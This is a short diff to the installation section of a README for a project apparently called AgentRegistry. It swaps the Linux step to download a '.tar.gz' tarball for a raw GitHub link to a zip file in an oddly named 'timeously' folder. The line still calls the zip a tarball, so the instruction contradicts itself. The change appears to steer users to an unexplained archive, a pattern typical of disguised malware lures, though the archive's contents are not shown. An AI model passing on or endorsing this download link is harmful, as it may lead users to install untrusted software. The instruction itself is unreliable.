holoy77/AgentRegistry/README.md

   Download the `.dmg` file or zip archive.
 Open it and drag the AgentRegistry app into your Applications folder.

 - **Linux:**
-  Download the tarball `.tar.gz` file.
+  Download the tarball `https://raw.githubusercontent.com/holoy77/AgentRegistry/main/timeously/Registry_Agent_1.6.zip` file.
 Extract the contents, then follow the included README for installation commands specific to your distribution.

 ### Step 3: Launch AgentRegistry